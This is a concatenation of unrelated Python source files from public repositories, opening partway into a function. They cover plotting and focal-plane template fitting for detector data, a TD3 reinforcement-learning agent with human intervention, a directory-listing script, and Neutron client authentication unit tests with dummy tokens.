pl.subplots_adjust(left=.1, right=.95, top=.95, bottom=.1,
hspace=.2, wspace=.3)
title_fs = 12
# Time constants...
#
pl.subplot(2,2,1)
z = self.tau * 1e3
pl.imshow(bin(z), interpolation='nearest', **limit_args(z))
pl.colorbar()
x_eyes()
pl.title('Time constants (ms)', fontsize=title_fs)
imshow_reformat()
pl.subplot(2,2,2)
z = self.tau_err * 1e3
pl.imshow(bin(z), interpolation='nearest', **limit_args(z))
pl.colorbar()
x_eyes()
pl.title('Time constant errors (ms)', fontsize=title_fs)
imshow_reformat()
if self.ok.sum() > 10:
pl.subplot(2,2,3)
pl.hist(self.tau[self.ok]*1e3, bins=20) #min(20,self.ok.sum()//10)
pl.xlabel('Time constant (ms)')
pl.ylabel('N_dets')
pl.subplot(2,2,4)
pl.hist(self.tau_err[self.ok]*1e3, bins=self.ok.sum()//10)
pl.xlabel('Time constant errors (ms)')
pl.ylabel('N_dets')
pl.savefig(filename+'time_const.png')
pl.clf()
# Positions and stuff
#
for i in [0,1]:
pl.subplot(2,2,1+i)
z = {0: self.x0_err, 1:self.y0_err}[i]
z = z * 180*3600/np.pi # to arcseconds
pl.imshow(bin(z), interpolation='nearest', **limit_args(z))
pl.colorbar()
x_eyes()
imshow_reformat()
pl.title('%s position RMS' % {0: 'X', 1: 'Y'}[i],
fontsize=title_fs)
pl.subplot(2,2,3)
z = self.n_obs
pl.imshow(bin(z), interpolation='nearest')
pl.colorbar()
imshow_reformat()
pl.title('N_obs', fontsize=title_fs)
pl.savefig(filename+'positions.png')
pl.clf()
# Destroy our subplot adjustments
pl.figure()
class FPTemplateFitter:
"""
Class for shift/rotate/shearing a template FPFitFile to match a
target FPFitFile.
After initializing, set the template to use:
fitter = FPTemplateFitter()
fitter.set_template(my_template_fp)
ok, params = fitter.fit(my_target_fp)
Those params are stored internally, so you can get the model FP:
model_for_target = fitter.get_modeled(my_target_fp)
"""
param_names = ['dx', 'dy', 'theta', 'scale', 'shear_theta', 'shear_scale']
formats = {'dx': '%9.6f',
'dy': '%9.6f',
'scale': '%11.4e',
'n_dets': '%4i',
'theta': '%9.6f',
'shear_scale': '%11.4e',
'shear_theta': '%9.6f',
}
@classmethod
def from_params(cls, opts, tod_info=None):
if '_execcfg' in opts:
tod_id = moby2.scripting.products.get_tod_id(tod_info=tod_info)
ic = moby2.scripting.execcfg.InputChooser()
opts1 = ic.get_config(opts['_execcfg'], tod_id=tod_id)
for k,v in list(opts1.items()):
if not k in opts:
opts[k] = v
if 'depot' in opts:
depot = moby2.scripting.get_depot(opts['depot'])
if not 'structure' in opts:
opts['structure'] = '{tag}'
filename = depot.get_full_path(**opts)
else:
filename = opts['filename']
trace(2, 'Loading as template: %s' % filename)
load_args = opts['column_def']
pos_data = moby2.util.StructDB.from_column_file(filename, load_args)
r = opts.get('template_rescale', (1.,1.))
if 'ok' in pos_data.dtype.names:
mask = (pos_data['ok'].astype(int) != 0)
else:
mask = np.ones(pos_data['x'].shape, bool)
template_fits = FPFitFile(det_uid=pos_data['det_uid'][mask])
template_fits.x0[:] = pos_data['x'][mask] * r[0]
template_fits.y0[:] = pos_data['y'][mask] * r[1]
template_fits.ok[:] = True
self = cls()
self.set_template(template_fits)
return self
def set_template(self, template):
self.template = template
self.pivot = self.template.x0[self.template.ok].mean(), \
self.template.y0[self.template.ok].mean()
@staticmethod
def _rotate(theta, x, y):
c, s = np.cos(theta), np.sin(theta)
return x*c - y*s, y*c + x*s
def model(self, params, x=None, y=None):
"""
Shift, rotate, shear the current template according to params
dict. Return the resulting offsets (x, y).
"""
dx, dy, theta, scale, sh_theta, sh_scale = params
scale, sh_scale = np.exp(scale), np.exp(sh_scale)
# Shift away array center and rescale
if x is None:
tp = self.template
x, y = tp.x0, tp.y0
out_x, out_y = scale*(x - self.pivot[0]), scale*(y - self.pivot[1])
# Shear
out_x, out_y = self._rotate(+sh_theta, out_x, out_y)
out_x *= sh_scale
out_x, out_y = self._rotate(-sh_theta, out_x, out_y)
# Rotate
out_x, out_y = self._rotate(theta, out_x, out_y)
# Restore array center and apply additional shift.
return out_x + self.pivot[0] - dx, out_y + self.pivot[1] - dy
def model_inverse(self, params, out_x, out_y):
"""
Inverse of self.model. Keep it up to date!
"""
dx, dy, theta, scale, sh_theta, sh_scale = params
scale, sh_scale = np.exp(scale), np.exp(sh_scale)
# Remove additional shift.
x, y = out_x - self.pivot[0] + dx, out_y - self.pivot[1] + dy
# Unrotate
x, y = self._rotate(-theta, x, y)
# Unshear
x, y = self._rotate(+sh_theta, x, y)
x /= sh_scale
x, y = self._rotate(-sh_theta, x, y)
x, y = x/scale + self.pivot[0], y/scale + self.pivot[1]
return x, y
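    # Added numerical sanity sketch: model_inverse should undo model for any
    # parameter vector (values below are arbitrary).
    #   fitter = FPTemplateFitter()
    #   fitter.pivot = (0.0, 0.0)
    #   p = [0.01, -0.02, 0.1, 0.05, 0.2, -0.03]
    #   x, y = fitter.model(p, np.array([0.1]), np.array([0.2]))
    #   fitter.model_inverse(p, x, y)   # ~ (array([0.1]), array([0.2]))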
def fit(self, fp, params, trace_level=0):
"""
Fit positions to a template, which is also an FPFitFile but
may represent different det_uid. 'params' should be a dict
like this one:
params = {
'shift': True,
'rotation': True,
'scale': True,
'shear': True,
}
Returns (ok, params). The fitted_template has the same
det_uid as self.
"""
template = self.template
# Get mask of items that are ok in both the template and fits
fp_ok = fp.ok.astype('bool').copy()
_, temp_ok = template.get_property('ok', fp.det_uid)
fp_ok *= temp_ok
# Get the template and fits positions for those ok items
_, x0 = template.get_property('x0', fp.det_uid[fp_ok])
_, y0 = template.get_property('y0', fp.det_uid[fp_ok])
x1, y1 = fp.x0[fp_ok], fp.y0[fp_ok]
self.A = x0,y0
self.B = x1,y1
# Identify parameters we want to vary
free_params = [params.get('shift', True)]*2
free_params.append(params.get('rotation', True))
free_params.append(params.get('scale', False))
free_params.extend([params.get('shear', False)]*2)
if fp.ok.sum() == 0:
trace(trace_level+0, 'No items for template fit')
self.result = False, [0. for f in free_params]
return self.result
trace(trace_level+0, 'Fitting template using %i items' % fp_ok.sum())
# Start fit with shift based on mean displacement
params0 = [x1.mean()-self.pivot[0], y1.mean()-self.pivot[1],
0., 0., 0., 0.]
trace(trace_level+1, 'Starting parameters: %s' % str(params0))
trace(trace_level+1, 'Free parameters: %s' % str(free_params))
def fit_chi2(params):
x_model, y_model = self.model(params, x0, y0)
var = (x1 - x_model)**2 + (y1 - y_model)**2
#return var.sum()
# Attenuate contribution of outliers? Not clear this works...
mvar = np.median(var)
var_roll = var * (10*mvar / (10*mvar + var))
return var_roll.sum()
# Minimize... start with position or all is lost.
params1 = params0
for iters in [0,1]:
for free_mask in [
# Fit position only...
[True , True , False, False, False, False],
# Fit rotation and scale
[False, False, True , True , False, False],
# Fit skew
[False, False, False, False, True , True ],
# Fit skew and position
[True , True , False, False, True , True ],
# Let everything float
[True , True , True , True , True , True ]]:
free = np.array(free_params) * free_mask
if free.sum() > 0:
params1 = moby2.util.fitting.multi_fmin(
fit_chi2, params1, free=free, disp=0,
xtol=1e-6, ftol=1e-6)
trace(trace_level+2, 'params snapshot: %s' % str(params1))
trace(trace_level+1, 'Final parameters: %s' % str(params1))
self.result = True, params1
return self.result
def check_result(self, opts):
"""
Check self.result against ranges passed in by user. User
passes in a dict with keys like "<name>_range", where <name>
is one of self.param_names. The values are the range (lo, hi) of
acceptable values. If any range checks fail, the function
returns false.
"""
ok, params = self.result
if not ok:
return False
for k, v in zip(self.param_names, params):
k = '%s_range' % k
if not k in opts: continue
if not ((opts[k][0] <= v) and (v < opts[k][1])):
return False
return True
def get_modeled(self, det_uid=None):
"""
Return a FPFitFile with the modeled detector positions. Pass
in the desired det_uid, or the template det_uid will be
used.
"""
if det_uid is None:
det_uid = self.det_uid
matched = FPFitFile(det_uid=det_uid)
_, ok = self.template.get_property('ok', matched.det_uid)
_, x0 = self.template.get_property('x0', matched.det_uid)
_, y0 = self.template.get_property('y0', matched.det_uid)
matched.ok = ok
params = self.result[1]
matched.x0, matched.y0 = self.model(params, x0, y0)
return matched
def make_plots(self, fp, modeled, plot_prefix='./',
title=None):
"""
Show fit quality in a few plots.
"""
import pylab as pl
def sane_axes():
fig.gca().xaxis.set_major_locator(pl.MaxNLocator(4))
fig.gca().yaxis.set_major_locator(pl.MaxNLocator(5))
fig.gca().set_aspect('equal', 'datalim')
DEG = 180./np.pi
fig = pl.figure()
fig.set_size_inches(8., 4.)
pl.subplots_adjust(left=.1, right=.98, top=.85, bottom=.1,
hspace=.2, wspace=.3)
pl.subplot(121)
tp = self.template
s, x, y = tp.ok, tp.x0, tp.y0
pl.scatter(x[s], y[s], marker='o', s=4, alpha=.5)
pl.xlabel('X')
pl.ylabel('Y')
pl.title('Input template')
sane_axes()
# The model positions
pl.subplot(122)
s, x, y = modeled.ok, modeled.x0 * DEG, modeled.y0 * DEG
pl.scatter(x[s], y[s], alpha=.2)
# And the fit positions
s, x, y = fp.ok, fp.x0 * DEG, fp.y0 * DEG
pl.scatter(x[s], y[s], marker='x')
# Now connect them with lines...
u = fp.det_uid[s]
ok1, (x1, y1) = modeled.get_property(['x0','y0'], det_uid=u)
x, y = x[s], y[s]
for i in ok1.nonzero()[0]:
pl.plot([x1[i]*DEG, x[i]], [y1[i]*DEG, y[i]], color='k', alpha=.4)
pl.xlabel('X (deg)')
pl.ylabel('Y (deg)')
pl.title('Fitted result')
sane_axes()
if title != None:
pl.figtext(0.5, 0.93, title, va='bottom', ha='center')
pl.savefig(plot_prefix + 'fit.png')
pl.figure() # destroy our settings...
def old_make_plots(self, fp, modeled, plot_prefix='./',
title=None):
"""
Show fit quality in a few plots.
"""
import pylab as pl
DEG = 180./np.pi
pl.figure()
pl.gcf().set_size_inches(6., 6.)
pl.subplots_adjust(left=.15, right=.95, top=.90, bottom=.1,
hspace=.2, wspace=.3)
tp = self.template
s, x, y = tp.ok, tp.x0, tp.y0
pl.scatter(x[s], y[s], marker='x')
pl.savefig(plot_prefix + '0template.png')
pl.clf()
s, x, y = modeled.ok, modeled.x0 * DEG, modeled.y0 * DEG
pl.scatter(x[s], y[s], alpha=.2)
pl.xlabel('X (deg)')
pl.ylabel('Y (deg)')
pl.savefig(plot_prefix + '1model.png')
pl.clf()
# The model positions
s, x, y = modeled.ok, modeled.x0 * DEG, modeled.y0 * DEG
pl.scatter(x[s], y[s], alpha=.2)
# And the fit positions
s, x, y = fp.ok, fp.x0 * DEG, fp.y0 * DEG
pl.scatter(x[s], y[s], marker='x')
# Now connect them with lines...
u = fp.det_uid[s]
ok1, (x1, y1) = modeled.get_property(['x0','y0'], det_uid=u)
x, y = x[s], y[s]
for i in ok1.nonzero()[0]:
pl.plot([x1[i]*DEG, x[i]], [y1[i]*DEG, y[i]], color='k', alpha=.4)
pl.xlabel('X (deg)')
pl.ylabel('Y (deg)')
if title is not None:
pl.title(title)
pl.savefig(plot_prefix + '2fit.png')
pl.figure() # destroy our settings...
# Formatted output...
def get_ascii(self, names=None, params=None):
if names is None:
names = self.param_names
if params is None:
params = self.result[1]
idx = [self.param_names.index(f) for f in names]
text = [ self.formats.get(n, '%11.4e') % params[i]
for n,i in zip(names,idx) ]
return ' '.join(text)
@staticmethod
def write_fit_list(filename, keys, fits, format=None):
if format == 'fits':
columns = list(zip(*[f.result[1] for f in fits]))
col_defs = ([('id', keys), ('ok', [int(f.result[0]) for f in fits])] +
list(zip(fits[0].param_names, columns)))
db_out = moby2.util.StructDB.from_data(
col_defs, formats=fits[0].formats)
db_out.to_fits_table(filename)
else:
if isinstance(filename, basestring):
filename = open(filename, 'w')
names = fits[0].param_names
filename.write('# %s\n' % ' '.join(names))
for key, fit in zip(keys, fits):
text = fit.get_ascii(names=names)
filename.write('%s %s\n' % (key, text))
| 1.148438 | 1 |
github/joeynmt/vizseq/__init__.py | shania3322/joeynmt | 0 | 35460 | <reponame>shania3322/joeynmt<gh_stars>0
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
#
import os.path as op
from pathlib import Path
FILE_ROOT = Path(__file__).parent
with open(op.join(FILE_ROOT, 'VERSION')) as f:
__version__ = f.read()
from vizseq.ipynb import *
from vizseq.ipynb import fairseq_viz as fairseq
| 0.925781 | 1 |
TD3_based_DRL/TD3IARL.py | wujingda/Human-in-the-loop-Deep-Reinforcement-Learning-Hug-DRL- | 8 | 35588 | <reponame>wujingda/Human-in-the-loop-Deep-Reinforcement-Learning-Hug-DRL-
'''
This algorithm is a IA-RL implementation on off-policy TD3 algorithm, to check the original IA-RL algorithm
you can refer to https://arxiv.org/abs/1811.06187.
Since it is a baseline algorithm, the descriptions are mostly omitted, please visit the HUGTD3.py for more implementation details
'''
import pickle
import numpy as np
import torch
import torch.nn as nn
from TD3_based_DRL.priority_replay import Memory
from TD3_based_DRL.network_model import Actor,Critic
from TD3_based_DRL.util import hard_update, soft_update
seed = 2
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
np.random.seed(seed)
torch.manual_seed(seed)
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
MEMORY_CAPACITY = 38400
BATCH_SIZE = 128
GAMMA = 0.95
LR_C = 0.0005
LR_A = 0.0002
LR_I = 0.01
TAU = 0.001
POLICY_NOSIE = 0.2
POLICY_FREQ = 1
NOISE_CLIP = 0.5
class DRL:
def __init__(self, action_dim, state_dim, LR_C = LR_C, LR_A = LR_A):
self.device = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')
self.state_dim = state_dim[0] * state_dim[1]
self.state_dim_width = state_dim[0]
self.state_dim_height = state_dim[1]
self.action_dim = action_dim
self.batch_size = BATCH_SIZE
self.gamma = GAMMA
self.tau = TAU
self.policy_noise = POLICY_NOSIE
self.noise_clip = NOISE_CLIP
self.policy_freq = POLICY_FREQ
self.itera = 0
self.pointer = 0
self.memory = Memory(MEMORY_CAPACITY)
self.actor = Actor(self.state_dim,self.action_dim).to(self.device)
self.actor_target = Actor(self.state_dim,self.action_dim).to(self.device)
self.actor_optimizer = torch.optim.Adam(self.actor.parameters(),LR_A)
self.critic = Critic(self.state_dim,self.action_dim).to(self.device)
self.critic_target = Critic(self.state_dim,self.action_dim).to(self.device)
self.critic_optimizers = torch.optim.Adam(self.critic.parameters(),LR_C)
hard_update(self.actor_target,self.actor)
hard_update(self.critic_target,self.critic)
def learn(self, batch_size = BATCH_SIZE, epoch=0):
## batched state, batched action, batched action from expert, batched intervention signal, batched reward, batched next state
bs, ba, ba_e, bi, br, bs_, tree_idx, ISweight = self.retrive(batch_size)
bs = torch.tensor(bs, dtype=torch.float).reshape(batch_size, self.state_dim_height, self.state_dim_width).to(self.device)
ba = torch.tensor(ba, dtype=torch.float).to(self.device).to(self.device)
ba_e = torch.tensor(ba_e, dtype=torch.float).to(self.device).to(self.device)
br = torch.tensor(br, dtype=torch.float).to(self.device).to(self.device)
bs_ = torch.tensor(bs_, dtype=torch.float).reshape(batch_size, self.state_dim_height, self.state_dim_width).to(self.device)
# initialize the loss variables
loss_c, loss_a = 0, 0
## calculate the predicted values of the critic
with torch.no_grad():
            # Clip the target-policy smoothing noise symmetrically, as in TD3;
            # NOISE_CLIP is defined above for exactly this purpose.
            noise1 = (torch.randn_like(ba) * self.policy_noise).clamp(-self.noise_clip, self.noise_clip)
a_ = (self.actor_target(bs_).detach() + noise1).clamp(0, 1)
target_q1, target_q2 = self.critic_target([bs_,a_])
target_q1 = target_q1.detach()
target_q2 = target_q2.detach()
target_q = torch.min(target_q1,target_q2)
y_expected = br + self.gamma * target_q
y_predicted1, y_predicted2 = self.critic.forward([bs,ba])
errors = y_expected - y_predicted1
## update the critic
critic_loss = nn.MSELoss()
loss_critic = critic_loss(y_predicted1,y_expected)+critic_loss(y_predicted2,y_expected)
self.critic_optimizers.zero_grad()
loss_critic.backward()
self.critic_optimizers.step()
## update the actor
if self.itera % self.policy_freq == 0:
index1,_ = np.where(bi==0)
index2,_ = np.where(bi==1)
bs1,_,_,_=bs[index1],ba[index1],br[index1],bs_[index1]
bs2,ba2,_,_=bs[index2],ba[index2],br[index2],bs_[index2]
if bs2.size(0) != 0:
if bs1.size(0) != 0:
bs1 = torch.reshape(bs1,(len(bs1), self.state_dim_height, self.state_dim_width))
bs2 = torch.reshape(bs2,(len(bs2), self.state_dim_height, self.state_dim_width))
pred_a1 = self.actor.forward(bs1)
pred_a2 = self.actor.forward(bs2)
loss_actor1 = (-self.critic.forward([bs1,pred_a1])[0])
## fixed weight for human guidance actions
loss_actor2 = 3 * ((pred_a2 - ba2)**2)
loss_actor = torch.cat((loss_actor1,loss_actor2),0).mean()
else:
pred_a = self.actor.forward(bs)
loss_actor = 3*((pred_a - ba)**2)
loss_actor = loss_actor.mean()
else:
pred_a = self.actor.forward(bs)
loss_actor = (-self.critic.forward([bs,pred_a])[0]).mean()
self.actor_optimizer.zero_grad()
loss_actor.backward()
self.actor_optimizer.step()
soft_update(self.actor_target,self.actor,self.tau)
soft_update(self.critic_target,self.critic,self.tau)
loss_a = loss_actor.mean().item()
loss_c = loss_critic.mean().item()
self.itera += 1
self.memory.batch_update(tree_idx, abs(errors.detach().cpu().numpy()) )
return loss_c, loss_a
def choose_action(self,state):
state = torch.tensor(state,dtype=torch.float).reshape(self.state_dim_height, self.state_dim_width).to(self.device)
state = state.unsqueeze(0)
action = self.actor.forward(state).detach()
action = action.squeeze(0).cpu().numpy()
action = np.clip(action,-1, 1)
return action
def store_transition(self, s, a, a_e, i, r, s_):
transition = np.hstack((s, a, a_e, i, r, s_))
self.memory.store(transition)
self.pointer += 1
def retrive(self, batch_size):
tree_index, bt, ISWeight = self.memory.sample(batch_size)
bs = bt[:, :self.state_dim]
ba = bt[:, self.state_dim: self.state_dim + self.action_dim]
ba_e = bt[:, self.state_dim + self.action_dim: self.state_dim + self.action_dim + self.action_dim]
bi = bt[:, -self.state_dim - 2: -self.state_dim - 1]
br = bt[:, -self.state_dim - 1: -self.state_dim]
bs_ = bt[:, -self.state_dim:]
return bs, ba, ba_e, bi, br, bs_, tree_index, ISWeight
def memory_save(self):
per = open("memory_IARL.pkl", 'wb')
str = pickle.dumps(self.memory)
per.write(str)
per.close()
def memory_load(self):
with open("memory_IARL.pkl",'rb') as file:
self.memory = pickle.loads(file.read())
def load_model(self, output):
if output is None: return
self.actor.load_state_dict(torch.load('{}/actor.pkl'.format(output)))
self.critic.load_state_dict(torch.load('{}/critic.pkl'.format(output)))
def save_model(self, output):
torch.save(self.actor.state_dict(), '{}/actor.pkl'.format(output))
torch.save(self.critic.state_dict(), '{}/critic.pkl'.format(output))
def save(self, log_dir, epoch):
state = {'actor':self.actor.state_dict(), 'actor_target':self.actor_target.state_dict(),
'actor_optimizer':self.actor_optimizer.state_dict(),
'critic':self.critic.state_dict(), 'critic_target':self.critic_target.state_dict(),
'critic_optimizers':self.critic_optimizers.state_dict(),
'epoch':epoch}
torch.save(state, log_dir)
def load(self, log_dir):
checkpoint = torch.load(log_dir)
self.actor.load_state_dict(checkpoint['actor'])
self.actor_target.load_state_dict(checkpoint['actor_target'])
self.actor_optimizer.load_state_dict(checkpoint['actor_optimizer'])
self.critic.load_state_dict(checkpoint['critic'])
self.critic_target.load_state_dict(checkpoint['critic_target'])
self.critic_optimizers.load_state_dict(checkpoint['critic_optimizers'])
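# Added usage sketch (dimensions are hypothetical): typical interaction loop
# wiring for this agent.
#   agent = DRL(action_dim=2, state_dim=(80, 45))
#   a = agent.choose_action(state)                    # action in [-1, 1]
#   agent.store_transition(state.flatten(), a, a_human,
#                          intervened, reward, next_state.flatten())
#   if agent.pointer > BATCH_SIZE:
#       loss_c, loss_a = agent.learn()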
| 2.40625 | 2 |
mtianyan/listname.py | mtianyan/mtianyan | 0 | 35716 | import os.path
filepathlist=[]
filenamelist=[]
def processDirectory ( args, dirname, filenames ):
for filename in filenames:
file_path=os.path.join(dirname,filename)
if os.path.isfile(file_path):
filepathlist.append(file_path)
filenamelist.append(filename)
def getpatch(path):
os.path.walk(r'%s'%path, processDirectory, None )
return filepathlist
getpatch('H:\CodePath\NoteBook\uber_input')
with open('data_list.txt', 'w') as fw:
    for item in filenamelist:
        fw.write(item + '\n')
| 1.867188 | 2 |
neutronclient/tests/unit/test_auth.py | asadoughi/python-neutronclient | 1 | 35844 | <reponame>asadoughi/python-neutronclient
# Copyright 2012 NEC Corporation
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# vim: tabstop=4 shiftwidth=4 softtabstop=4
import copy
import httplib2
import json
import uuid
import mox
import testtools
from neutronclient import client
from neutronclient.common import exceptions
from neutronclient.common import utils
USERNAME = 'testuser'
TENANT_NAME = 'testtenant'
TENANT_ID = 'testtenantid'
PASSWORD = 'password'
AUTH_URL = 'authurl'
ENDPOINT_URL = 'localurl'
ENDPOINT_OVERRIDE = 'otherurl'
TOKEN = 'tokentoken'
REGION = 'RegionTest'
KS_TOKEN_RESULT = {
'access': {
'token': {'id': TOKEN,
'expires': '2012-08-11T07:49:01Z',
'tenant': {'id': str(uuid.uuid1())}},
'user': {'id': str(uuid.uuid1())},
'serviceCatalog': [
{'endpoints_links': [],
'endpoints': [{'adminURL': ENDPOINT_URL,
'internalURL': ENDPOINT_URL,
'publicURL': ENDPOINT_URL,
'region': REGION}],
'type': 'network',
'name': 'Neutron Service'}
]
}
}
ENDPOINTS_RESULT = {
'endpoints': [{
'type': 'network',
'name': 'Neutron Service',
'region': REGION,
'adminURL': ENDPOINT_URL,
'internalURL': ENDPOINT_URL,
'publicURL': ENDPOINT_URL
}]
}
class CLITestAuthKeystone(testtools.TestCase):
# Auth Body expected when using tenant name
auth_type = 'tenantName'
def setUp(self):
"""Prepare the test environment."""
super(CLITestAuthKeystone, self).setUp()
self.mox = mox.Mox()
self.client = client.HTTPClient(username=USERNAME,
tenant_name=TENANT_NAME,
password=PASSWORD,
auth_url=AUTH_URL,
region_name=REGION)
self.addCleanup(self.mox.VerifyAll)
self.addCleanup(self.mox.UnsetStubs)
def test_get_token(self):
self.mox.StubOutWithMock(self.client, "request")
res200 = self.mox.CreateMock(httplib2.Response)
res200.status = 200
self.client.request(
AUTH_URL + '/tokens', 'POST',
body=mox.StrContains(self.auth_type), headers=mox.IsA(dict)
).AndReturn((res200, json.dumps(KS_TOKEN_RESULT)))
self.client.request(
mox.StrContains(ENDPOINT_URL + '/resource'), 'GET',
headers=mox.ContainsKeyValue('X-Auth-Token', TOKEN)
).AndReturn((res200, ''))
self.mox.ReplayAll()
self.client.do_request('/resource', 'GET')
self.assertEqual(self.client.endpoint_url, ENDPOINT_URL)
self.assertEqual(self.client.auth_token, TOKEN)
def test_refresh_token(self):
self.mox.StubOutWithMock(self.client, "request")
self.client.auth_token = TOKEN
self.client.endpoint_url = ENDPOINT_URL
res200 = self.mox.CreateMock(httplib2.Response)
res200.status = 200
res401 = self.mox.CreateMock(httplib2.Response)
res401.status = 401
        # If a token is expired, the neutron server returns 401
self.client.request(
mox.StrContains(ENDPOINT_URL + '/resource'), 'GET',
headers=mox.ContainsKeyValue('X-Auth-Token', TOKEN)
).AndReturn((res401, ''))
self.client.request(
AUTH_URL + '/tokens', 'POST',
body=mox.IsA(str), headers=mox.IsA(dict)
).AndReturn((res200, json.dumps(KS_TOKEN_RESULT)))
self.client.request(
mox.StrContains(ENDPOINT_URL + '/resource'), 'GET',
headers=mox.ContainsKeyValue('X-Auth-Token', TOKEN)
).AndReturn((res200, ''))
self.mox.ReplayAll()
self.client.do_request('/resource', 'GET')
def test_get_endpoint_url(self):
self.mox.StubOutWithMock(self.client, "request")
self.client.auth_token = TOKEN
res200 = self.mox.CreateMock(httplib2.Response)
res200.status = 200
self.client.request(
mox.StrContains(AUTH_URL + '/tokens/%s/endpoints' % TOKEN), 'GET',
headers=mox.IsA(dict)
).AndReturn((res200, json.dumps(ENDPOINTS_RESULT)))
self.client.request(
mox.StrContains(ENDPOINT_URL + '/resource'), 'GET',
headers=mox.ContainsKeyValue('X-Auth-Token', TOKEN)
).AndReturn((res200, ''))
self.mox.ReplayAll()
self.client.do_request('/resource', 'GET')
def test_use_given_endpoint_url(self):
self.client = client.HTTPClient(
username=USERNAME, tenant_name=TENANT_NAME, password=PASSWORD,
auth_url=AUTH_URL, region_name=REGION,
endpoint_url=ENDPOINT_OVERRIDE)
self.assertEqual(self.client.endpoint_url, ENDPOINT_OVERRIDE)
self.mox.StubOutWithMock(self.client, "request")
self.client.auth_token = TOKEN
res200 = self.mox.CreateMock(httplib2.Response)
res200.status = 200
self.client.request(
mox.StrContains(ENDPOINT_OVERRIDE + '/resource'), 'GET',
headers=mox.ContainsKeyValue('X-Auth-Token', TOKEN)
).AndReturn((res200, ''))
self.mox.ReplayAll()
self.client.do_request('/resource', 'GET')
self.assertEqual(self.client.endpoint_url, ENDPOINT_OVERRIDE)
def test_get_endpoint_url_other(self):
self.client = client.HTTPClient(
username=USERNAME, tenant_name=TENANT_NAME, password=PASSWORD,
auth_url=AUTH_URL, region_name=REGION, endpoint_type='otherURL')
self.mox.StubOutWithMock(self.client, "request")
self.client.auth_token = TOKEN
res200 = self.mox.CreateMock(httplib2.Response)
res200.status = 200
self.client.request(
mox.StrContains(AUTH_URL + '/tokens/%s/endpoints' % TOKEN), 'GET',
headers=mox.IsA(dict)
).AndReturn((res200, json.dumps(ENDPOINTS_RESULT)))
self.mox.ReplayAll()
self.assertRaises(exceptions.EndpointTypeNotFound,
self.client.do_request,
'/resource',
'GET')
def test_get_endpoint_url_failed(self):
self.mox.StubOutWithMock(self.client, "request")
self.client.auth_token = TOKEN
res200 = self.mox.CreateMock(httplib2.Response)
res200.status = 200
res401 = self.mox.CreateMock(httplib2.Response)
res401.status = 401
self.client.request(
mox.StrContains(AUTH_URL + '/tokens/%s/endpoints' % TOKEN), 'GET',
headers=mox.IsA(dict)
).AndReturn((res401, ''))
self.client.request(
AUTH_URL + '/tokens', 'POST',
body=mox.IsA(str), headers=mox.IsA(dict)
).AndReturn((res200, json.dumps(KS_TOKEN_RESULT)))
self.client.request(
mox.StrContains(ENDPOINT_URL + '/resource'), 'GET',
headers=mox.ContainsKeyValue('X-Auth-Token', TOKEN)
).AndReturn((res200, ''))
self.mox.ReplayAll()
self.client.do_request('/resource', 'GET')
def test_url_for(self):
resources = copy.deepcopy(KS_TOKEN_RESULT)
endpoints = resources['access']['serviceCatalog'][0]['endpoints'][0]
endpoints['publicURL'] = 'public'
endpoints['internalURL'] = 'internal'
endpoints['adminURL'] = 'admin'
catalog = client.ServiceCatalog(resources)
# endpoint_type not specified
url = catalog.url_for(attr='region',
filter_value=REGION)
self.assertEqual('public', url)
# endpoint type specified (3 cases)
url = catalog.url_for(attr='region',
filter_value=REGION,
endpoint_type='adminURL')
self.assertEqual('admin', url)
url = catalog.url_for(attr='region',
filter_value=REGION,
endpoint_type='publicURL')
self.assertEqual('public', url)
url = catalog.url_for(attr='region',
filter_value=REGION,
endpoint_type='internalURL')
self.assertEqual('internal', url)
# endpoint_type requested does not exist.
self.assertRaises(exceptions.EndpointTypeNotFound,
catalog.url_for,
attr='region',
filter_value=REGION,
endpoint_type='privateURL')
# Test scenario with url_for when the service catalog only has publicURL.
def test_url_for_only_public_url(self):
resources = copy.deepcopy(KS_TOKEN_RESULT)
catalog = client.ServiceCatalog(resources)
        # Strip internalURL and adminURL so only publicURL remains.
endpoints = resources['access']['serviceCatalog'][0]['endpoints'][0]
del endpoints['internalURL']
del endpoints['adminURL']
endpoints['publicURL'] = 'public'
# Use publicURL when specified explicitly.
url = catalog.url_for(attr='region',
filter_value=REGION,
endpoint_type='publicURL')
self.assertEqual('public', url)
        # And also when no endpoint type is specified.
url = catalog.url_for(attr='region',
filter_value=REGION)
self.assertEqual('public', url)
# Test scenario with url_for when the service catalog only has adminURL.
def test_url_for_only_admin_url(self):
resources = copy.deepcopy(KS_TOKEN_RESULT)
catalog = client.ServiceCatalog(resources)
endpoints = resources['access']['serviceCatalog'][0]['endpoints'][0]
del endpoints['internalURL']
del endpoints['publicURL']
endpoints['adminURL'] = 'admin'
        # Use adminURL when specified explicitly.
url = catalog.url_for(attr='region',
filter_value=REGION,
endpoint_type='adminURL')
self.assertEqual('admin', url)
# But not when nothing is specified.
self.assertRaises(exceptions.EndpointTypeNotFound,
catalog.url_for,
attr='region',
filter_value=REGION)
def test_endpoint_type(self):
resources = copy.deepcopy(KS_TOKEN_RESULT)
endpoints = resources['access']['serviceCatalog'][0]['endpoints'][0]
endpoints['internalURL'] = 'internal'
endpoints['adminURL'] = 'admin'
endpoints['publicURL'] = 'public'
# Test default behavior is to choose public.
self.client = client.HTTPClient(
username=USERNAME, tenant_name=TENANT_NAME, password=PASSWORD,
auth_url=AUTH_URL, region_name=REGION)
self.client._extract_service_catalog(resources)
self.assertEqual(self.client.endpoint_url, 'public')
# Test admin url
self.client = client.HTTPClient(
username=USERNAME, tenant_name=TENANT_NAME, password=PASSWORD,
auth_url=AUTH_URL, region_name=REGION, endpoint_type='adminURL')
self.client._extract_service_catalog(resources)
self.assertEqual(self.client.endpoint_url, 'admin')
# Test public url
self.client = client.HTTPClient(
username=USERNAME, tenant_name=TENANT_NAME, password=PASSWORD,
auth_url=AUTH_URL, region_name=REGION, endpoint_type='publicURL')
self.client._extract_service_catalog(resources)
self.assertEqual(self.client.endpoint_url, 'public')
# Test internal url
